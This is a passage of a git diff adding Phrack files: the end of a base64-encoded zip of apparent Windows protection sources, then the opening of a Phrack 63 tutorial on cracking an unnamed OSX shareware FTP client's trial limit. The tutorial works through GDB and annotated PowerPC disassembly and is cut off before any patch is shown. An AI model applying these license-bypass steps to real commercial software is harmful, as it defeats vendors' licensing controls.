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
+hkSPwXf/9tLlSSL1W38LmtbZNum2gf7PjNfn3bPzFVBLAwQKAAAAAABwmHQy
+Ys3JchUAAAAVAAAAKAAAAFBST1RULVBBQ0svcHJvdHR5LW9sZC9zb3VyY2Uv
+cHJvdHR5MS5kZWZFWFBPUlRTDQpTVEFSVF9QUk9UVFlQSwMECgAAAAAAJ1jB
+MgAAAAAAAAAAAAAAABoAAABQUk9UVC1QQUNLL3Byb3R0eV9leGFtcGxlL1BL
+AwQUAAAACACVYYwyFa7ZtaICAAAMBQAAJQAAAFBST1RULVBBQ0svcHJvdHR5
+X2V4YW1wbGUvc2FtcGxlX2JvLmOlU91v2jAQfwaJ/+FGXwILJaXrw9Z1UtdR
+UakqFWUPFUPIJBfiNbEj20noKv73nU34UJ8mzUTGvvP97ut3J1yEaREhfNUm
+4vI0+dZqnhzLUr58J6y4iGSl30lDKWrzVrPfBZ1gmoaSND2oFDcIWmZ4JDYJ
+M1Bo1JAraTA0GEGGYcIE15nu9lvNQmi+EiQmoYKIGTY7G8zhCt5azUaw/hz4
+8L97q7m5tAFvf/1uwyRcA30moVhZlqcIcSFCw6WAKuFhArJE5RLaPloWcSwV
+UERCqoyloA0LX9yrOJVVwybSapaSRyAr4blUuloWKsSOS8RJZDkbBHMKpZFh
+Fuavniz97SP/4mzQsYpccWFiUtjb5hA0SSFjXHj2wNQq9Lc+6FjO5s7Hzosr
+/owA55eNevX7lBaq48ZUPE1hiZCnLMRoZ/s7yxeo8/XsfH715goYrG9vaRt+
+2lzuoDhgiYLCIZhXWQCDtpB5j2yBbNvwpUNwh0UWCrfkIEAwEtY3N/bPKHIN
+NppTFz19RKlerwc/xvAwnsJ0/PNmBNPR3RNhOoWtc+NesuieLxVTr97wYTqc
+LB4n4+n0eXF/931yPXlePF5Pb0aL0XAydDV9ShFz7ywIAnf9Fx8uHmqSRuO5
+mvmuGAMLcUiLsoaY6shWSM8XTGfwdpy2o1nNovautG0omeJsmVqbRooMcLn2
+nZODpYxjcg0eiw2qPc06gDy3ViyKnNUgOO5w3VGFEVfbSaMit3dt2Xtja38X
+y8GYiQiqmhWpvXAaS+qvjA+csQiZLGFGruc+4ZBgs+1bzWf39OP5hW/H2Nf8
+D8rYs+dOZ88ebeQxEeta17xvd7eLyPXCxQqWUmY9u0Gt6P4S7Y4b5oYdNAez
+b4nDJ0vcV+xDDa/QFEpAYIfqL1BLAQIUAAoAAAAAAE9YwTIAAAAAAAAAAAAA
+AAALAAAAAAAAAAAAEAAAAAAAAABQUk9UVC1QQUNLL1BLAQIUABQAAAAIAHBD
+wjKHEuc5KQIAAPcDAAAXAAAAAAAAAAEAIAAAACkAAABQUk9UVC1QQUNLL01V
+U1RSRUFELnR4dFBLAQIUAAoAAAAAAPdWwTIAAAAAAAAAAAAAAAAaAAAAAAAA
+AAAAEAAAAIcCAABQUk9UVC1QQUNLL3Byb3R0eS1jdXJyZW50L1BLAQIUAAoA
+AAAAABFXwTIAAAAAAAAAAAAAAAAeAAAAAAAAAAAAEAAAAL8CAABQUk9UVC1Q
+QUNLL3Byb3R0eS1jdXJyZW50L2Jpbi9QSwECFAAUAAAACADAisEyoZ/aT+kQ
+AAAAMAAAKAAAAAAAAAAAACAAAAD7AgAAUFJPVFQtUEFDSy9wcm90dHktY3Vy
+cmVudC9iaW4vcHJvdHR5LkRMTFBLAQIUABQAAAAIAI+KwTL7ri1qlgAAANQA
+AAAoAAAAAAAAAAEAIAAAACoUAABQUk9UVC1QQUNLL3Byb3R0eS1jdXJyZW50
+L2Jpbi9SRUFETUUudHh0UEsBAhQACgAAAAAAFljBMgAAAAAAAAAAAAAAACEA
+AAAAAAAAAAAQAAAABhUAAFBST1RULVBBQ0svcHJvdHR5LWN1cnJlbnQvc291
+cmNlL1BLAQIUABQAAAAIAFlheTJDRARvYgAAAI4AAAAsAAAAAAAAAAEAIAAA
+AEUVAABQUk9UVC1QQUNLL3Byb3R0eS1jdXJyZW50L3NvdXJjZS9jb21waWxl
+LmJhdFBLAQIUABQAAAAIAC5aeTIvAUUgoQUAADcUAAAvAAAAAAAAAAEAIAAA
+APEVAABQUk9UVC1QQUNLL3Byb3R0eS1jdXJyZW50L3NvdXJjZS9kZWJ1Z19w
+cm90LmluY1BLAQIUABQAAAAIAL1ziTJ7evqn/AEAAF0EAAArAAAAAAAAAAEA
+IAAAAN8bAABQUk9UVC1QQUNLL3Byb3R0eS1jdXJyZW50L3NvdXJjZS9teV9k
+bGwuaW5jUEsBAhQACgAAAAAAnYzBMgAAAAAAAAAAAAAAACYAAAAAAAAAAAAQ
+AAAAJB4AAFBST1RULVBBQ0svcHJvdHR5LWN1cnJlbnQvc291cmNlL3Byb3Qv
+UEsBAhQAFAAAAAgAMUpPLJnanyiBAgAAbAoAAC8AAAAAAAAAAQAgAAAAaB4A
+AFBST1RULVBBQ0svcHJvdHR5LWN1cnJlbnQvc291cmNlL3Byb3QvQURFMzIu
+QVNIUEsBAhQAFAAAAAgAMU1PLMnuzR6JBgAAsR4AADIAAAAAAAAAAQAgAAAA
+NiEAAFBST1RULVBBQ0svcHJvdHR5LWN1cnJlbnQvc291cmNlL3Byb3QvQURF
+MzJCSU4uQVNJUEsBAhQAFAAAAAgAGVTBMjDHoskfAwAAFgYAAC4AAAAAAAAA
+AQAgAAAADygAAFBST1RULVBBQ0svcHJvdHR5LWN1cnJlbnQvc291cmNlL3By
+b3QvY29uZi5pbmNQSwECFAAUAAAACACcicEycKjX0/oCAADrCQAAMAAAAAAA
+AAABACAAAAB6KwAAUFJPVFQtUEFDSy9wcm90dHktY3VycmVudC9zb3VyY2Uv
+cHJvdC9leGNlcHQuaW5jUEsBAhQAFAAAAAgAaVyTMoBVHcjnAwAAmAoAADUA
+AAAAAAAAAQAgAAAAwi4AAFBST1RULVBBQ0svcHJvdHR5LWN1cnJlbnQvc291
+cmNlL3Byb3QvZXhwb3J0X2tpbGwuaW5jUEsBAhQAFAAAAAgAmlKrMn42UcAH
+AgAABwgAADEAAAAAAAAAAQAgAAAA/DIAAFBST1RULVBBQ0svcHJvdHR5LWN1
+cnJlbnQvc291cmNlL3Byb3QvZ2V0YXBpcy5pbmNQSwECFAAUAAAACAB2Uqsy
+R4FMWAYEAADFDgAAMgAAAAAAAAABACAAAABSNQAAUFJPVFQtUEFDSy9wcm90
+dHktY3VycmVudC9zb3VyY2UvcHJvdC9ndWFyZGlhbi5pbmNQSwECFAAUAAAA
+CACVg8EyemWLON8EAABcDQAAMgAAAAAAAAABACAAAACoOQAAUFJPVFQtUEFD
+Sy9wcm90dHktY3VycmVudC9zb3VyY2UvcHJvdC9pYXRfa2lsbC5pbmNQSwEC
+FAAUAAAACADVQMIy5sRD0vgEAADNDwAAMQAAAAAAAAABACAAAADXPgAAUFJP
+VFQtUEFDSy9wcm90dHktY3VycmVudC9zb3VyY2UvcHJvdC9raV9mdWxsLmlu
+Y1BLAQIUABQAAAAIAPBjmzLKFwZ6EgIAAEEFAAAxAAAAAAAAAAEAIAAAAB5E
+AABQUk9UVC1QQUNLL3Byb3R0eS1jdXJyZW50L3NvdXJjZS9wcm90L2tpX2hv
+b2suaW5jUEsBAhQAFAAAAAgAj1DBMqWrsqYkBQAAiw0AAC4AAAAAAAAAAQAg
+AAAAf0YAAFBST1RULVBBQ0svcHJvdHR5LWN1cnJlbnQvc291cmNlL3Byb3Qv
+bWFpbi5pbmNQSwECFAAUAAAACACZo5AyBfEePjcEAAD+CgAALwAAAAAAAAAB
+ACAAAADvSwAAUFJPVFQtUEFDSy9wcm90dHktY3VycmVudC9zb3VyY2UvcHJv
+dC9tb2RybS5pbmNQSwECFAAUAAAACAB8U8Ey4TdwG34BAADSAgAALQAAAAAA
+AAABACAAAABzUAAAUFJPVFQtUEFDSy9wcm90dHktY3VycmVudC9zb3VyY2Uv
+cHJvdC9wZWIuaW5jUEsBAhQAFAAAAAgASIiOMnbeE8k+AgAAXgYAADEAAAAA
+AAAAAQAgAAAAPFIAAFBST1RULVBBQ0svcHJvdHR5LWN1cnJlbnQvc291cmNl
+L3Byb3QvdXNlZnVsbC5pbmNQSwECFAAUAAAACACOSMEyhufKvNoBAADqBAAA
+KwAAAAAAAAABACAAAADJVAAAUFJPVFQtUEFDSy9wcm90dHktY3VycmVudC9z
+b3VyY2UvcHJvdHR5LmFzbVBLAQIUABQAAAAIAI2tZCnPM6it3r0AAF89BAAt
+AAAAAAAAAAEAIAAAAOxWAABQUk9UVC1QQUNLL3Byb3R0eS1jdXJyZW50L3Nv
+dXJjZS9XSU4zMkFQSS5JTkNQSwECFAAKAAAAAAC7WMEyAAAAAAAAAAAAAAAA
+FgAAAAAAAAAAABAAAAAVFQEAUFJPVFQtUEFDSy9wcm90dHktb2xkL1BLAQIU
+AAoAAAAAAEWKwTIAAAAAAAAAAAAAAAAaAAAAAAAAAAAAEAAAAEkVAQBQUk9U
+VC1QQUNLL3Byb3R0eS1vbGQvYmluL1BLAQIUABQAAAAIALmJwTIiFFiuuA0A
+AAAwAAAlAAAAAAAAAAAAIAAAAIEVAQBQUk9UVC1QQUNLL3Byb3R0eS1vbGQv
+YmluL3Byb3R0eTIuRExMUEsBAhQAFAAAAAgAe4rBMnNdn9KCAAAAnwAAACQA
+AAAAAAAAAQAgAAAAfCMBAFBST1RULVBBQ0svcHJvdHR5LW9sZC9iaW4vUkVB
+RE1FLlRYVFBLAQIUAAoAAAAAAAI/wjIAAAAAAAAAAAAAAAAdAAAAAAAAAAAA
+EAAAAEAkAQBQUk9UVC1QQUNLL3Byb3R0eS1vbGQvc291cmNlL1BLAQIUABQA
+AAAIAAw/wjJwtgJQaAAAAJUAAAAoAAAAAAAAAAEAIAAAAHskAQBQUk9UVC1Q
+QUNLL3Byb3R0eS1vbGQvc291cmNlL2NvbXBpbGUuYmF0UEsBAhQAFAAAAAgA
+Llp5Mi8BRSChBQAANxQAACsAAAAAAAAAAQAgAAAAKSUBAFBST1RULVBBQ0sv
+cHJvdHR5LW9sZC9zb3VyY2UvZGVidWdfcHJvdC5pbmNQSwECFAAUAAAACAC9
+c4kye3r6p/wBAABdBAAAJwAAAAAAAAABACAAAAATKwEAUFJPVFQtUEFDSy9w
+cm90dHktb2xkL3NvdXJjZS9teV9kbGwuaW5jUEsBAhQACgAAAAAAJ4rBMgAA
+AAAAAAAAAAAAACUAAAAAAAAAAAAQAAAAVC0BAFBST1RULVBBQ0svcHJvdHR5
+LW9sZC9zb3VyY2UvcHJvdHR5MS9QSwECFAAUAAAACACyicEyEk1XrwMCAACT
+AwAALQAAAAAAAAABACAAAACXLQEAUFJPVFQtUEFDSy9wcm90dHktb2xkL3Nv
+dXJjZS9wcm90dHkxL2NvbmYuaW5jUEsBAhQAFAAAAAgAnInBMnCo19P6AgAA
+6wkAAC8AAAAAAAAAAQAgAAAA5S8BAFBST1RULVBBQ0svcHJvdHR5LW9sZC9z
+b3VyY2UvcHJvdHR5MS9leGNlcHQuaW5jUEsBAhQAFAAAAAgADlyJMkjU6Dey
+BAAAKQ0AADQAAAAAAAAAAQAgAAAALDMBAFBST1RULVBBQ0svcHJvdHR5LW9s
+ZC9zb3VyY2UvcHJvdHR5MS9leHBvcnRfa2lsbC5pbmNQSwECFAAUAAAACAAu
+c4ky81ZtVpEBAADRBQAAMAAAAAAAAAABACAAAAAwOAEAUFJPVFQtUEFDSy9w
+cm90dHktb2xkL3NvdXJjZS9wcm90dHkxL2dldGFwaXMuaW5jUEsBAhQAFAAA
+AAgA8XOJMrFsZbU3AwAAmwgAADEAAAAAAAAAAQAgAAAADzoBAFBST1RULVBB
+Q0svcHJvdHR5LW9sZC9zb3VyY2UvcHJvdHR5MS9ndWFyZGlhbi5pbmNQSwEC
+FAAUAAAACAAihcEyCsHJwuwFAADWDwAAMQAAAAAAAAABACAAAACVPQEAUFJP
+VFQtUEFDSy9wcm90dHktb2xkL3NvdXJjZS9wcm90dHkxL2lhdF9raWxsLmlu
+Y1BLAQIUABQAAAAIAMyFwTJSoMK5DQcAAGoVAAAwAAAAAAAAAAEAIAAAANBD
+AQBQUk9UVC1QQUNLL3Byb3R0eS1vbGQvc291cmNlL3Byb3R0eTEva2lfZnVs
+bC5pbmNQSwECFAAUAAAACADnWoky0Sy5fAYCAAAmBQAAMAAAAAAAAAABACAA
+AAArSwEAUFJPVFQtUEFDSy9wcm90dHktb2xkL3NvdXJjZS9wcm90dHkxL2tp
+X2hvb2suaW5jUEsBAhQAFAAAAAgAc1l5Mi15GsQwBAAATxAAADEAAAAAAAAA
+AQAgAAAAf00BAFBST1RULVBBQ0svcHJvdHR5LW9sZC9zb3VyY2UvcHJvdHR5
+MS9MREUzMkJJTi5JTkNQSwECFAAUAAAACAAmhsEyrunfzO8EAAARDQAALQAA
+AAAAAAABACAAAAD+UQEAUFJPVFQtUEFDSy9wcm90dHktb2xkL3NvdXJjZS9w
+cm90dHkxL21haW4uaW5jUEsBAhQAFAAAAAgAOVl5Mn0ywfQxAQAAGwIAACwA
+AAAAAAAAAQAgAAAAOFcBAFBST1RULVBBQ0svcHJvdHR5LW9sZC9zb3VyY2Uv
+cHJvdHR5MS9wZWIuaW5jUEsBAhQAFAAAAAgA1lmJMi0AEIY8AAAASQAAADgA
+AAAAAAAAAQAgAAAAs1gBAFBST1RULVBBQ0svcHJvdHR5LW9sZC9zb3VyY2Uv
+cHJvdHR5MS9QUk9UVFlfUkVWSVNJT04udHh0UEsBAhQAFAAAAAgA4IXBMjBE
+vCcEBAAASwsAADAAAAAAAAAAAQAgAAAARVkBAFBST1RULVBBQ0svcHJvdHR5
+LW9sZC9zb3VyY2UvcHJvdHR5MS91c2VmdWxsLmluY1BLAQIUABQAAAAIABc/
+wjI1Es4M0gEAAOAEAAAoAAAAAAAAAAEAIAAAAJddAQBQUk9UVC1QQUNLL3By
+b3R0eS1vbGQvc291cmNlL3Byb3R0eTEuYXNtUEsBAhQACgAAAAAAcJh0MmLN
+yXIVAAAAFQAAACgAAAAAAAAAAQAgAAAAr18BAFBST1RULVBBQ0svcHJvdHR5
+LW9sZC9zb3VyY2UvcHJvdHR5MS5kZWZQSwECFAAKAAAAAAAnWMEyAAAAAAAA
+AAAAAAAAGgAAAAAAAAAAABAAAAAKYAEAUFJPVFQtUEFDSy9wcm90dHlfZXhh
+bXBsZS9QSwECFAAUAAAACACVYYwyFa7ZtaICAAAMBQAAJQAAAAAAAAABACAA
+AABCYAEAUFJPVFQtUEFDSy9wcm90dHlfZXhhbXBsZS9zYW1wbGVfYm8uY1BL
+BQYAAAAANQA1ADMSAAAnYwEAAAA=
+====
+<-->
+
+
+|=[ EOF ]=---------------------------------------------------------------=|
diff --git a/phrack63/16.txt b/phrack63/16.txt
new file mode 100644
index 0000000..4e975d8
--- /dev/null
+++ b/phrack63/16.txt
@@ -0,0 +1,725 @@
+                           ==Phrack Inc.==
+
+              Volume 0x0b, Issue 0x3f, Phile #0x10 of 0x14
+
+|=-----=[ Reverse engineering - PowerPC Cracking on OSX with GDB ]=------=|
+|=-----------------------------------------------------------------------=|
+|=--------------------------=[ curious ]=--------------------------------=|
+|=-----------------------------------------------------------------------=|
+
+--[ Contents
+
+ 1.0 - Introduction
+ 2.0 - The Target
+ 3.0 - Attack Transcript
+ 4.0 - Solutions and Patching
+ A - GDB, OSX, PPC & Cocoa - Some observations. 
+ B - Why can't we just patch with GDB?
+
+--[ 1.0 - Introduction
+
+    This article is a guide to taking apart OSX applications and 
+reprogramming their inner structures to behave differently to their
+original designs.  This will be explored while uncrippling a 
+shareware program.  While the topic will be tackled step by step,
+I encourage you to go out and try these things for yourself, on your
+own programs, instead of just slavishly repeating what you read here.
+
+    This technique has other important applications, including writing
+patches for closed source software where the company has gone out of
+business or is not interested, malware analysis and fixing incorrectly 
+compiled programs.
+
+    It is assumed you have a little rudimentary knowledge in this area 
+already - perhaps you have some assembly programming or you have some
+cracking experience on Windows or Linux.  Hopefully you'll at least 
+know a little bit about assembly language - what it is, and how it 
+basically works ( what a register is, what a relative jump is, etc. )  
+If you've never worked with PowerPC assembly on OSX before, you might 
+want to have a look at appendix A before we set off.  If you have some 
+basic familiarity with GDB, it will also be very useful.
+
+    This tutorial uses the following tools and resources - the XCode
+Cocoa Documentation, which is included with the OSX developer tools,
+a PowerPC assembly reference ( I recommend IBM's "PowerPC Microprocessor
+Family: The Programming Environments for 32-Bit Microprocessors" - you
+can get it off their website ), gcc, an editor and a hexeditor ( I use
+bvi ).  You'll also be using either XCode/Interface Builder or Steve 
+Nygard's "class-dump" and Apple's "otool". 
+
+    I'm no expert on this subject - my knowledge is cobbled 
+together from time spent working in this area with Windows, then Linux and 
+now OSX.  I'm sure there's lots in this article that could be done more
+correctly / efficiently / easily, and if you know, please write to me and
+discuss it!  Already this article is seriously indebted to the excellent
+suggestions and hard work of Christian Klein of Teenage Mutant Hero Coders.
+
+   I had a very hard time deciding whether or not to publish this article
+anonymously.  Recently, my country has enacted ( or threatened to enact )
+DMCA style laws that represent a substantial threat to the kinds of
+exploration and research that this document represents - exploration and
+research which have important academic and corporate applications.  I
+believe that I have not broken any laws in authoring this document,
+but the justice system can paint with a broad brush sometimes.  
+
+ Thanks for reading,
+   <curious@progsoc.org>
+
+--[ 2.0 - The Target
+
+    The target is a shareware client for SFTP and FTP, which I was first
+exposed to after the automatic ftp execution controversy a few years ago
+( see - <http://www.tidbits.com/tb-issues/TidBITS-731.html#lnk4> ).  Out
+of respect for the authors, I'm not going to name it explicitly, and
+the version analysed is now deprecated.
+
+--[ 3.0 - Attack Transcript
+
+    The first step is to prompt the program to display the undesirable
+behavior we wish to alter, so we know what to look out for and change.
+From reading the documentation, I know that I have fifteen days of usage
+before the program will start to assert it's shareware status - after
+that time period, I will be unable to use the Favourites menu, and 
+sessions will be time limited.
+
+    As I didn't want to wait around fifteen days, I deleted the program
+preferences in ~/Library/Application Support/, and set the clock back
+one year.  I ran the software, quit, and then returned the clock to
+normal.  Now, when I attempt to run the software, I receive the expired
+message, and the sanctions mentioned above take effect.
+
+    Now we need to decide where we are to make the initial incision 
+In the program.  Starting at main() or even NSApplicationMain() ( 
+which is where Cocoa programs 'begin' ) is not always feasible in the 
+large, object based and event driven programs that have become the norm 
+in Cocoa development, so here's what I've come up with after a few false 
+starts.
+
+    One approach is to attack it from the Interface.  If you have a look
+inside the application bundle ( the .app file - really a folder ), you'll 
+most likely find a collection of nib files that specify the user interface.
+I found a nib file for the registration dialog, and opened it in Interface 
+Builder.
+
+    Inspecting the actions referred to there we find a promising sounding
+IBAction "validateRegistration:" attached to a class 
+"RegistrationController".  This sounds like a good place to start, but if 
+the developers are anything like me, they won't have really dragged their 
+classes into IB, and the real class names may be very different.
+
+    If you didn't have any luck finding a useful nib file, don't despair.
+If you have class-dump handy, run it on the actual mach-o executable
+( usually in <whatever>.app/Contents/MacOS/ ), and it will attempt to
+form class declarations for the program.  Have a look around there for
+a likely candidate function.
+
+    Now that we have some ideas of where to start, let's fire up GDB
+and look a bit closer.  Start GDB on the mach-o executable. Once loaded, 
+let's search for the function name we discovered.  If you still don't
+have a function name to work with ( due to no nib files and no 
+class-dump ), you can just run "info fun" to get a list of functions
+GDB can index in the program.
+
+ | (gdb) info fun validateRegistration
+ | All functions matching regular expression "validateRegistration":
+ | Non-debugging symbols:
+ | 0x00051830  -[StateController validateRegistration:]
+
+    "StateController" would appear to be the internal name for that 
+registration controlling object referred to earlier.  Let's see
+what methods are registered against it:
+
+ | (gdb) info fun StateController
+ | All functions matching regular expression "StateController":
+ | Non-debugging symbols:
+ | 0x0005090c  -[StateController init]
+ | 0x00050970  +[StateController sharedInstance]
+ | 0x000509f8  -[StateController appDidLaunch]
+ | 0x00050e48  -[StateController cancelRegistration:]
+ | 0x00050e8c  -[StateController findLostNumber:]
+ | 0x00050efc  -[StateController state]
+ | 0x00050fd0  -[StateController validState]
+ | 0x00051128  -[StateController saveState:]
+ | 0x000512e0  -[StateController appendState:]
+ | 0x00051600  -[StateController initState]
+ | 0x0005165c  -[StateController stateDidChange:]
+ | 0x00051830  -[StateController validateRegistration:]
+ | 0x00051bd8  -[StateController windowDidLoad]
+
+    "validState", having no arguments ( no trailing ':' ) sounds very 
+promising.  Placing a breakpoint on it and running the program shows
+it's called twice on startup, and twice when attempting to possibly change
+registration state - this seems logical, as there are two possible 
+sanctions for expired copies as discussed earlier.  Let's dig a bit
+deeper with this function.  
+
+    Here's a commented partial disassembly - I've tried to bring it down 
+to something readable on 75 columns, but your mileage may vary.  I'm
+mainly providing this for those unfamiliar with PPC assembly, and it's
+summarized at the end.
+
+(gdb) disass 0x50fd0
+Dump of assembler code for function -[StateController validState]:
+0x00050fd0 <-[StateController validState]+0>:   mflr    r0
+
+	# Copy the link register to r0.
+
+0x00050fd4 <-[StateController validState]+4>:   stmw    r27,-20(r1)
+
+	# Store r27, r28, r29, r30 and r31 in five consecutive words 
+	# starting at r1 - 20 ( 0xbfffe2bc ).
+
+0x00050fd8 <-[StateController validState]+8>:   addis   r4,r12,4
+
+	# r4 = r12 + 4 || 16(0)
+	#
+	# || = "concatenated", in this case with sixteen zeroes.
+        # this has the effect of shifting the "four" ( 100B )
+	# into the high sixteen of the register.
+
+0x00050fdc <-[StateController validState]+12>:  stw     r0,8(r1)
+
+	# Write r0 to r1 + 8.
+
+0x00050fe0 <-[StateController validState]+16>:  mr      r29,r3
+
+	# Copy r3 to r29.  At the moment, this would contain
+	# the address of the object we're being invoked on 
+	# ( a StateController instance ).
+
+0x00050fe4 <-[StateController validState]+20>:  addis   r3,r12,4
+
+	# As 0x50fd8, but into r3.
+
+0x00050fe8 <-[StateController validState]+24>:  stwu    r1,-96(r1)
+
+	# Store Word With Update:
+	#  "address" = r1 - 96
+	#  store r1 to "address"
+	#  r1 = "address"
+
+0x00050fec <-[StateController validState]+28>:  mr      r31,r12
+
+	# Copy r12 to r31.
+
+0x00050ff0 <-[StateController validState]+32>:  lwz     r4,1620(r4)
+
+	# Load r4 with contents of memory address r4 + 1620 ( 0x91624 ).
+	# r4 now contains 0x908980CC = c string, "sharedInstance".
+
+0x00050ff4 <-[StateController validState]+36>:  lwz     r3,5944(r3)
+
+	# Load r3 with contents of memory address r3 + 5944 ( 0x92708 ).
+	# r3 now contains 0x92b20 = objc object, describes itself as
+	# "Preferences".
+	#
+	# This seems to be an instance of the undocumented preferences
+	# api used by mail and safari.  Tut tut.
+
+0x00050ff8 <-[StateController validState]+40>:  
+	bl      0x739d0 <dyld_stub_objc_msgSend>
+
+	# r3 = [ Preferences sharedInstance ];
+	# (gdb) po $r3
+	# <Preferences: 0x10d6c0>
+
+0x00050ffc <-[StateController validState]+44>:  lwz     r0,40(r29)
+
+	# Load r29 + 40 into r0.  As you may recall, r29 was set
+	# at 0x50fe0 to be the StateController instance.  Hence 
+	# this offset refers to some kind of instance variable.
+	#
+	# In this case, it's value is nil.  Guess it hasn't been
+	# assigned yet.  My theory is that this function will be
+	# invoked several times on the same object and this, the
+	# first run through, will do initialization.
+
+0x00051000 <-[StateController validState]+48>:  mr      r27,r3
+
+	# Copy the shared instance ( herein reffered to as prefObject )
+	# returned in 0x50ff8 to r27.
+
+0x00051004 <-[StateController validState]+52>:  cmpwi   cr7,r0,0
+	
+	# Compare r0 ( the first instance variable ( herein SC:1 ) )
+	# with nil, store the result.
+	#
+	# (gdb) print /t $cr
+	# $19 = 100100000000000100001001000010
+	#
+	# cr7 occupies offset 21-24, 001B ( "equal" ).
+	# The CR's can contain 100B ( "higher" ), 010B ( "lower" )
+	# or 001B ( "equal" ).
+	
+0x00051008 <-[StateController validState]+56>:  
+	bne+    cr7,0x51030 <-[StateController validState]+96>
+
+	# Jump to +96 if the equal bit of cr7 is not set.  
+	# It is, so we just continue on.
+
+0x0005100c <-[StateController validState]+60>:  addis   r4,r31,4
+
+	# As 0x50fd8, but into r4.  Note that r31 is the new address
+	# of the r12 address used in both of those instances.  I would
+	# say r31 contains the start of the table listing the
+	# message names available in this program.
+
+0x00051010 <-[StateController validState]+64>:  lwz     r4,5168(r4)
+
+	# Load r4 + 5168 into r4.  This turns out to be a c string,
+	# "firstLaunch".
+
+0x00051014 <-[StateController validState]+68>:  
+	bl      0x739d0 <dyld_stub_objc_msgSend>
+
+	# r3 = [ prefObject firstLaunch ];
+	# This turns out to be an NSDate object, in this case 
+	# 2003-09-19 23:30:10 +1000.  We'll refer to this as
+	# firstLaunchDate.
+
+0x00051018 <-[StateController validState]+72>:  cmpwi   cr7,r3,0
+
+	# Compare firstLaunchDate with nil, results to cr7.
+
+0x0005101c <-[StateController validState]+76>:  stw     r3,40(r29)
+
+	# Store r3 ( firstLaunchDate ) to r29 + 40 - you'll recall
+	# this as being the StateController local variable referred
+	# to 0x50ffc, SC:1.
+
+0x00051020 <-[StateController validState]+80>:  
+	beq+    cr7,0x51030 <-[StateController validState]+96>
+
+	# If the equal bit is set, jump to +96 - same location as
+	# at 0x51008 for successful loads.  Not what I was expecting.
+
+0x00051024 <-[StateController validState]+84>:  addis   r4,r31,4
